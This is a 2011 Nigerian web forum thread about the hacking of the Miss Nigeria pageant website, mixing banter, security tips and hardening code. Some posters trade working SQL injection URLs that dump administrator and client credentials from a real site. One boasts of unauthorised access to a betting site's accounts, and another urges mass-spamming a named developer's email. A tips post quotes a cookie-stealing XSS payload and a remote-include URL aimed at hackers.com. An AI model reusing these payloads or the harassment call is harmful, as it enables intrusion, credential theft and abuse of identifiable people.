
Miss Nigeria Website Hacked - Webmasters - Nairaland


Miss Nigeria Website Hacked by Orikinla(m): 10:38am On Jun 22, 2011
I discovered yesterday that the official website of the Miss Nigeria pageant has been hacked!

Home :: Miss Nigeria Pageant - www.missnigeriapageant.com/
Re: Miss Nigeria Website Hacked by Godmother(f): 4:15pm On Jun 22, 2011
This is a slap on the face of Nigerians
Re: Miss Nigeria Website Hacked by MrBarzini: 4:19pm On Jun 22, 2011
That's what happens when they pick up a developer from the streets of Lagos, or someone in Computer Village.
These days everybody that touches a keyboard calls himself an admin or sysadmin or whatever they call it.
It was defaced by some kid from Tunisia and hasn't even been cleared up till now. What a joke. Reading too much "for dummies" pdfs.
Re: Miss Nigeria Website Hacked by MrBarzini: 4:22pm On Jun 22, 2011
To think that he even configured the server to redirect all pages to the default page. Should be from .htaccess or conf, if on Apache. Definitely on Apache. He wouldn't use RD to deface IIS.
I talk too much.
Re: Miss Nigeria Website Hacked by yawatide(f): 7:13pm On Jun 22, 2011
Mr. Barzini,

Of course, the key question is will they, and others learn from this and start hiring competent people/firms? Sadly, the answer to that question is "no"
Re: Miss Nigeria Website Hacked by Slyr0x: 7:35am On Jun 23, 2011
Can someone pls spam the dude's email address olumartins@gmail.com with 10,000 mails?

Thanks.

This was first reported yesterday, and it's still there. This is sad.
Re: Miss Nigeria Website Hacked by guru01(m): 8:02am On Jun 23, 2011
What is the advantage of hacking a website?
Re: Miss Nigeria Website Hacked by Slyr0x: 9:08am On Jun 23, 2011
^^^ What is the advantage of breaking into a house?
Re: Miss Nigeria Website Hacked by Tavenue: 10:46am On Jun 23, 2011
It is a shame for such things to be happening. I have tried to reach the organizers of the event to no avail; I have also tried to reach the webmaster that developed the website without success.

I wonder why some people will continue to drag this country's name in the mud. Shame on some webmasters.
Re: Miss Nigeria Website Hacked by Tavenue: 10:48am On Jun 23, 2011
??
Re: Miss Nigeria Website Hacked by WebMonk(m): 12:23pm On Jun 23, 2011
Looks like it's been sorted (for now). The offending page is gone.
Re: Miss Nigeria Website Hacked by DualCore1: 12:58pm On Jun 23, 2011
Damage control:
First, index.php, index.html, default.html were removed (probably by the host).
Now, the hosting account has been terminated.

My predictions as to what's next:

New hosting account will be created,
Olumartins or whoever looks at all the site files on his PC and is like... ah ah, how did this happen, musta been a random attack or mistake... it won't happen again. (typical Nigerian, no offense).
Olumartins or whoever uploads the same files onto the new account created and goes to sleep.
Olumartins calls owners of site... sir, it's back up! I have fixed it!! (James Olu Bond)
Script kiddies here see the site is back and start rattling door knobs on the site to see if they can create a sequel.
Slyr0x or Number 7 "revisits" the site.
Slyr0x reports second hack

**All names are fictional and not targeted at any real individual, if there's any coincidence. . . as you have seen: it is just coincidence.
Re: Miss Nigeria Website Hacked by yawatide(f): 3:48pm On Jun 23, 2011
@DC:
I truly think, based on recent posts, that you should start writing comedy scripts for Nollywood LOL

Yep, unfortunately, the guy will just move from site to site, transferring domains and the hackers will follow him too.  I seriously doubt that the home page had any code that could subject the page to an attack.  I am calling out the web host on this one (I stand to be corrected)
Re: Miss Nigeria Website Hacked by remoranger(m): 4:46pm On Jun 23, 2011
@slyrox, Dual Core and co., please do a tutorial on website security. It's not enough to damn them; why not help, if you can? Because this could happen to anyone that manages a high-profile site. I suspect the web host too.
Re: Miss Nigeria Website Hacked by remoranger(m): 4:48pm On Jun 23, 2011
This .htaccess may help some of us

AddType text/x-component .htc
IndexIgnore *
ErrorDocument 400 /400.php
ErrorDocument 401 /401.php
ErrorDocument 403 /403.php
ErrorDocument 404 /404.php
ErrorDocument 500 /500.php
<Files .htaccess>
order allow,deny
deny from all
</Files>
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} ^BlackWidow [OR]
RewriteCond %{HTTP_USER_AGENT} ^Bot\ mailto:craftbot@yahoo.com [OR]
RewriteCond %{HTTP_USER_AGENT} ^ChinaClaw [OR]
RewriteCond %{HTTP_USER_AGENT} ^Custo [OR]
RewriteCond %{HTTP_USER_AGENT} ^DISCo [OR]
RewriteCond %{HTTP_USER_AGENT} ^Download\ Demon [OR]
RewriteCond %{HTTP_USER_AGENT} ^eCatch [OR]
RewriteCond %{HTTP_USER_AGENT} ^EirGrabber [OR]
RewriteCond %{HTTP_USER_AGENT} ^EmailSiphon [OR]
RewriteCond %{HTTP_USER_AGENT} ^EmailWolf [OR]
RewriteCond %{HTTP_USER_AGENT} ^Express\ WebPictures [OR]
RewriteCond %{HTTP_USER_AGENT} ^ExtractorPro [OR]
RewriteCond %{HTTP_USER_AGENT} ^EyeNetIE [OR]
RewriteCond %{HTTP_USER_AGENT} ^FlashGet [OR]
RewriteCond %{HTTP_USER_AGENT} ^GetRight [OR]
RewriteCond %{HTTP_USER_AGENT} ^GetWeb! [OR]
RewriteCond %{HTTP_USER_AGENT} ^Go!Zilla [OR]
RewriteCond %{HTTP_USER_AGENT} ^Go-Ahead-Got-It [OR]
RewriteCond %{HTTP_USER_AGENT} ^GrabNet [OR]
RewriteCond %{HTTP_USER_AGENT} ^Grafula [OR]
RewriteCond %{HTTP_USER_AGENT} ^HMView [OR]
RewriteCond %{HTTP_USER_AGENT} HTTrack [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Image\ Stripper [OR]
RewriteCond %{HTTP_USER_AGENT} ^Image\ Sucker [OR]
RewriteCond %{HTTP_USER_AGENT} Indy\ Library [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^InterGET [OR]
RewriteCond %{HTTP_USER_AGENT} ^Internet\ Ninja [OR]
RewriteCond %{HTTP_USER_AGENT} ^JetCar [OR]
RewriteCond %{HTTP_USER_AGENT} ^JOC\ Web\ Spider [OR]
RewriteCond %{HTTP_USER_AGENT} ^larbin [OR]
RewriteCond %{HTTP_USER_AGENT} ^LeechFTP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Mass\ Downloader [OR]
RewriteCond %{HTTP_USER_AGENT} ^MIDown\ tool [OR]
RewriteCond %{HTTP_USER_AGENT} ^Mister\ PiX [OR]
RewriteCond %{HTTP_USER_AGENT} ^Navroad [OR]
RewriteCond %{HTTP_USER_AGENT} ^NearSite [OR]
RewriteCond %{HTTP_USER_AGENT} ^NetAnts [OR]
RewriteCond %{HTTP_USER_AGENT} ^NetSpider [OR]
RewriteCond %{HTTP_USER_AGENT} ^Net\ Vampire [OR]
RewriteCond %{HTTP_USER_AGENT} ^NetZIP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Octopus [OR]
RewriteCond %{HTTP_USER_AGENT} ^Offline\ Explorer [OR]
RewriteCond %{HTTP_USER_AGENT} ^Offline\ Navigator [OR]
RewriteCond %{HTTP_USER_AGENT} ^PageGrabber [OR]
RewriteCond %{HTTP_USER_AGENT} ^Papa\ Foto [OR]
RewriteCond %{HTTP_USER_AGENT} ^pavuk [OR]
RewriteCond %{HTTP_USER_AGENT} ^pcBrowser [OR]
RewriteCond %{HTTP_USER_AGENT} ^RealDownload [OR]
RewriteCond %{HTTP_USER_AGENT} ^ReGet [OR]
RewriteCond %{HTTP_USER_AGENT} ^SiteSnagger [OR]
RewriteCond %{HTTP_USER_AGENT} ^SmartDownload [OR]
RewriteCond %{HTTP_USER_AGENT} ^SuperBot [OR]
RewriteCond %{HTTP_USER_AGENT} ^SuperHTTP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Surfbot [OR]
RewriteCond %{HTTP_USER_AGENT} ^tAkeOut [OR]
RewriteCond %{HTTP_USER_AGENT} ^Teleport\ Pro [OR]
RewriteCond %{HTTP_USER_AGENT} ^VoidEYE [OR]
RewriteCond %{HTTP_USER_AGENT} ^Web\ Image\ Collector [OR]
RewriteCond %{HTTP_USER_AGENT} ^Web\ Sucker [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebAuto [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebCopier [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebFetch [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebGo\ IS [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebLeacher [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebReaper [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebSauger [OR]
RewriteCond %{HTTP_USER_AGENT} ^Website\ eXtractor [OR]
RewriteCond %{HTTP_USER_AGENT} ^Website\ Quester [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebStripper [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebWhacker [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebZIP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Wget [OR]
RewriteCond %{HTTP_USER_AGENT} ^Widow [OR]
RewriteCond %{HTTP_USER_AGENT} ^WWWOFFLE [OR]
RewriteCond %{HTTP_USER_AGENT} ^Xaldon\ WebSpider [OR]
RewriteCond %{HTTP_USER_AGENT} ^Zeus
RewriteRule ^.* - [F,L]
Re: Miss Nigeria Website Hacked by yawatide(f): 4:53pm On Jun 23, 2011
Help them how? Dem pay me?

We even try to tell them via NL.  They should thank God that we care.

In the future, such high profile sites should be handled by an actual firm and not, as I suspect, some guy sitting under a Mango tree, coding with lantern who happens to have been subcontracted for peanuts by a crony.
Re: Miss Nigeria Website Hacked by DualCore1: 5:12pm On Jun 23, 2011
Lol yawa, but that is the foreseeable future of the site.


remoranger:

@slyrox, Dual Core and co., please do a tutorial on website security. It's not enough to damn them; why not help, if you can? Because this could happen to anyone that manages a high-profile site. I suspect the web host too.
Well, when I see a bad thing I do my bit to try and help. Up till this moment I still have access to all the member accounts of a Nigerian sports betting site (not saharabet.com, I built that one, even slyr0x can't touch it). I have tried to contact them through all possible means, even through the email address of the admin account that I got from the site's database. As if storing passwords in clear text wasn't enough insult to web dev, a user can set member password to null and log into the site with just the username (of course turning off the silly JavaScript password validation).

So what next should I do? They are just fortunate that I keep to myself; if not, I would have started withdrawing people's money one by one.

Edit:
Thanks for the .htaccess, saving it.

When I first saw it I thought it was the .htaccess of the site that you pulled out. I wanted to wonder how manage!


Here's an offer for young host companies: I could harden your dedicated/VPS servers as long as they are running on Linux and you have root access to it and can trust me with it. Someone gave me a new VPS he got from hostgator for me to work on and I didn't know when I told him his VPS was "embarrassingly insecure".
Re: Miss Nigeria Website Hacked by remoranger(m): 5:33pm On Jun 23, 2011
Well, to those learning: try and encrypt your passwords, sha1 or something, so when slyrox breaks into your site, your clients may be safe. Lol. And with the .htaccess above, try and use your admin folder as something else, http://www.dagbo.com/xyz; admin is tooooo predictable. You may laugh, but you'd be surprised how many serious would-be hackers this would filter out. Use complicated generated passwords, with symbols, uppercase letters and numbers; it may help you survive a dictionary attack. This won't necessarily stop me from hacking the daylights outta you, but at least try, gaddamnit lol
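As an added example (not code from any poster in this thread): the clear-text storage and the empty-password login described a few posts up are both closed on the server side. The sketch uses PHP's password_hash(), a salted and deliberately slow hash, in place of the bare SHA-1 suggested above; the members table, its columns and the 10-character minimum are assumptions.

```php
<?php
// Added example: server-side login check with salted, slow password hashes.
// Table name, column names and the length rule are assumptions for this demo.

function make_demo_db(): PDO {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE members (username TEXT PRIMARY KEY, pass_hash TEXT NOT NULL)');
    return $db;
}

function register_member(PDO $db, string $username, string $password): bool {
    // Enforce the rule on the server; browser-side JavaScript checks can be switched off.
    if ($username === '' || strlen($password) < 10) {
        return false;
    }
    // password_hash() generates a random salt and embeds it in the returned string.
    $hash = password_hash($password, PASSWORD_DEFAULT);
    $stmt = $db->prepare('INSERT INTO members (username, pass_hash) VALUES (?, ?)');
    return $stmt->execute([$username, $hash]);
}

function check_login(PDO $db, $username, $password): bool {
    static $dummy = null;
    // Reject missing, non-string or empty credentials before touching the database.
    if (!is_string($username) || !is_string($password) || $username === '' || $password === '') {
        return false;
    }
    $stmt = $db->prepare('SELECT pass_hash FROM members WHERE username = ?');
    $stmt->execute([$username]);
    $hash = $stmt->fetchColumn();
    if ($hash === false) {
        // Unknown user: still verify against a throwaway hash so response
        // time does not reveal which usernames exist.
        if ($dummy === null) {
            $dummy = password_hash('placeholder', PASSWORD_DEFAULT);
        }
        password_verify($password, $dummy);
        return false;
    }
    return password_verify($password, $hash);
}

// Constructed account and inputs for the demonstration.
$db = make_demo_db();
var_dump(register_member($db, 'demo_user', 'Constructed-Passw0rd!'));
var_dump(check_login($db, 'demo_user', 'Constructed-Passw0rd!'));
var_dump(check_login($db, 'demo_user', ''));    // empty password, client-side check bypassed
var_dump(check_login($db, 'demo_user', null));  // password field missing from the request
var_dump(check_login($db, 'no_such_user', 'Constructed-Passw0rd!'));
```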
Re: Miss Nigeria Website Hacked by Slyr0x: 5:44pm On Jun 23, 2011
Dual Core:

even slyr0x can't touch it)

HOST/pagedetail.php?pid=2+AND+1=2+UNION+ALL+SELECT+concat%280x1e,uname,0x1e,0x3a,pass,0x1e,0x20%29,2+FROM+administrator--
Re: Miss Nigeria Website Hacked by MrBarzini: 5:55pm On Jun 23, 2011
Slyr0x is a beast.
Re: Miss Nigeria Website Hacked by DualCore1: 7:16pm On Jun 23, 2011
Slyr0x:


HOST/pagedetail.php?pid=2+AND+1=2+UNION+ALL+SELECT+concat%280x1e,uname,0x1e,0x3a,pass,0x1e,0x20%29,2+FROM+administrator--
You may try some heads up before this kinda injections, for a second I thought that was saharabet and a blood vessel almost popped.
Have you by any means cracked the MD5 on that admin pass?

This gives you better juice
site/pagedetail.php?pid=44+UNION+ALL+SELECT+1,group_concat(id,username,id,password,id,email)+FROM+client
lol, I used id as the separator, couldn't figure out something better.

What's the role of the 1e and 3a hex in your injection?
Re: Miss Nigeria Website Hacked by Slyr0x: 8:22pm On Jun 23, 2011
I didn't bother myself with the password... and the hex values are just separators.

Re: Miss Nigeria Website Hacked by Nobody: 9:06am On Jun 24, 2011
A group known as LulzSec has been quoted as "taking down Minecraft, EVE Online and League of Legends servers – all in a single day."
They also have Senate.gov, CIA, Nintendo.com, Fox.com, FBI's Infragard, and Sony BMG under their belt, and they even go as far as telling it on Twitter: "we are taking down sony right now"

Come on, it's easier to destroy than to build. It's left to us developers to decide which role we want to play.
Not bad if the hacker reported it to the owners.

Here are some tips that may help someone:
1. Form the habit of escaping your SQL while you code; don't leave it till the end.
2. Using server-side includes rocks, but while at it, make sure you are not passing the included URL to your script as parameters.
Imagine http://mysite.com?page=index.php reconstructed to http://mysite.com?page=http://hackers.com/backdoor.txt
3. Use htmlentities(), it's free,
especially in your admin area, where you get to read messages sent from users.
You don't want to read something like this:
<img src="http://hackers.com/stealSession.php?"+encodeURI(document.cookie);>
It sends your admin area cookie to the hacker and you now have a new site administrator.
4. Use a hack like the one below:

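<?php
// Crude tripwire: look for "union" in the lower-cased query string.
$qs = strtolower($_SERVER['QUERY_STRING']);
if (strpos($qs, "+union+") !== false || strpos($qs, " union ") !== false) {
    // Block the client's current IP by appending a deny rule to .htaccess.
    fwrite(fopen(".htaccess", "a"), "\ndeny from " . $_SERVER['REMOTE_ADDR']);
    // Collect the request parameters and mail the details to the webmaster.
    $p = "";
    foreach ($_REQUEST as $k => $v) { $p .= $k . "=" . $v . "&"; }
    mail("youremail@webmaster.com", "hacker at work", $_SERVER['REMOTE_ADDR'] . "'s url:" . $_SERVER['REQUEST_URI'] . "\nPosts:" . $p);
    exit();
}
?>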

I now put the above boring code at the start of every page that does any serious stuff.
It simply checks for SQLi hackers' favorite string, blocks the user's "current" IP address and emails you details of what the hacker did. That will hopefully buy you time.
NOTE: you may want to check for other SQL syntax and add hexadecimal support to it before using it, because every hacker these days has hex tools installed.

DISCLAIMER: "dot your tee and cross your eyes" before attempting to use my code. The above is for educational purposes only and could make a hacker see you as a challenge and focus all attention on you. Your sorry ass may be sorry.
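An added example (not code from the post above or from anyone in this thread) showing tips 1 to 3 applied at the root cause, so the page does not depend on spotting "union" in the query string. The pages table, the page names and the include paths are assumptions made for the demonstration.

```php
<?php
// Added example covering tips 1-3; table, file and parameter names are assumptions.

// Tip 1: bind the value instead of building SQL from the request string.
function fetch_page(PDO $db, $pid): ?array {
    // A page id is a positive integer; anything else is rejected before the query runs.
    $id = filter_var($pid, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }
    $stmt = $db->prepare('SELECT id, title FROM pages WHERE id = ?');
    $stmt->execute([$id]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Tip 2: map the ?page= value onto a fixed allowlist, so the request
// never supplies a path or URL to include.
function resolve_include($page): string {
    $allowed = [
        'index'   => 'pages/index.php',
        'contact' => 'pages/contact.php',
    ];
    return (is_string($page) && isset($allowed[$page])) ? $allowed[$page] : $allowed['index'];
}

// Tip 3: encode user-supplied text at the point it is written into HTML.
function render_message(string $body): string {
    return '<p>' . htmlentities($body, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '</p>';
}

// Constructed sample data and inputs for the demonstration.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT)");
$db->exec("INSERT INTO pages VALUES (2, 'Contestants')");

var_dump(fetch_page($db, '2'));                               // well-formed id
var_dump(fetch_page($db, '2 AND 1=2 UNION ALL SELECT 1,2'));  // rejected, never reaches SQL
var_dump(resolve_include('contact'));                         // known page name
var_dump(resolve_include('http://example.invalid/x.txt'));    // falls back to the index page
var_dump(render_message('<script>alert(1)</script>'));        // markup is shown as text
```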
Re: Miss Nigeria Website Hacked by DualCore1: 9:25am On Jun 24, 2011
"hacker at work"
That's too serious joor and it's also life threatening if you are hypertensive. Imagine waking up in the middle of the night (if you sleep at night) to see the red light on your BB and it's "hacker at work".

Change the mail subject to "dem don come o!" then echo "your fada!"
Re: Miss Nigeria Website Hacked by Slyr0x: 11:29am On Jun 24, 2011
How Secured Are Your Websites/ Web Applications?

It has been garnered over time that more than 75% of all vulnerabilities discovered are at the application layer. And our experience shows that nine out of ten customers have at least one serious hole that could lead to customer data disclosure or total system compromise.

- In an online banking application, can an adversary siphon off funds?
- In an insurance application, can an adversary modify the terms of a user's policy?
- In a healthcare application, can an adversary change the prescription for a patient?
- In a school records application, can an attacker modify a student's record?

All these are put into consideration as Phynxlabs Penetration Testing services looks at a web site from the perspective of a malicious hacker and finds the holes before they can be exploited in real time.

There are other firms who offer application security testing, we try to be better, faster and cheaper.

Check site for more info - http://www.phynxlabs.com
Re: Miss Nigeria Website Hacked by remoranger(m): 12:37pm On Jun 24, 2011
You can use online tools for penetration testing and security analysis, e.g.

http://www.unmaskparasites.com or download from hp https://download.spidynamics.com/webinspect/default.htm


Google for the rest, lol. You people aren't paying me.
Re: Miss Nigeria Website Hacked by denzel2009: 12:52pm On Jun 24, 2011
Silly people, they will never learn. Security is fundamental!

I said it before and I'm saying it again. . . . There will be war on the cyberspace!

Now, the buzz word in corporate environments is Cloud! I foresee war!

Slyrox don't hack me oh, I have samurai sword.
Re: Miss Nigeria Website Hacked by remoranger(m): 1:29pm On Jun 24, 2011
@slyrox, so you're the baddest guy, eh? Okay, I am the webmaster of http://www.twitter.com, hack me if you can. lol
Re: Miss Nigeria Website Hacked by Slyr0x: 11:40am On Jun 26, 2011
At first, it was hacked by Number 7 (pic 1), the host got contacted, the hacked page was removed.

Now it's been hacked again by a supposed Islam patriot.

The Islam song playing sounds like all those Indian movie songs

Images below

Re: Miss Nigeria Website Hacked by remoranger(m): 12:18pm On Jun 26, 2011
shocking
Re: Miss Nigeria Website Hacked by DualCore1: 3:21pm On Jun 26, 2011
Yawa grin
Re: Miss Nigeria Website Hacked by Slyr0x: 2:35am On Jun 27, 2011
Dual Core:

Damage control:
First, index.php, index.html, default.html were removed (probably by the host).
Now, the hosting account has been terminated.

My predictions as to what's next:

New hosting account will be created,
Olumartins or whoever looks at all the site files on his PC and is like... ah ah, how did this happen, musta been a random attack or mistake... it won't happen again. (typical Nigerian, no offense).
Olumartins or whoever uploads the same files onto the new account created and goes to sleep.
Olumartins calls owners of site... sir, it's back up! I have fixed it!! (James Olu Bond)
Script kiddies here see the site is back and start rattling door knobs on the site to see if they can create a sequel.
Slyr0x or Number 7 "revisits" the site.
Slyr0x reports second hack

**All names are fictional and not targeted at any real individual, if there's any coincidence. . . as you have seen: it is just coincidence.


Just what you predicted... except this time around, 'twas sacker-boy :p
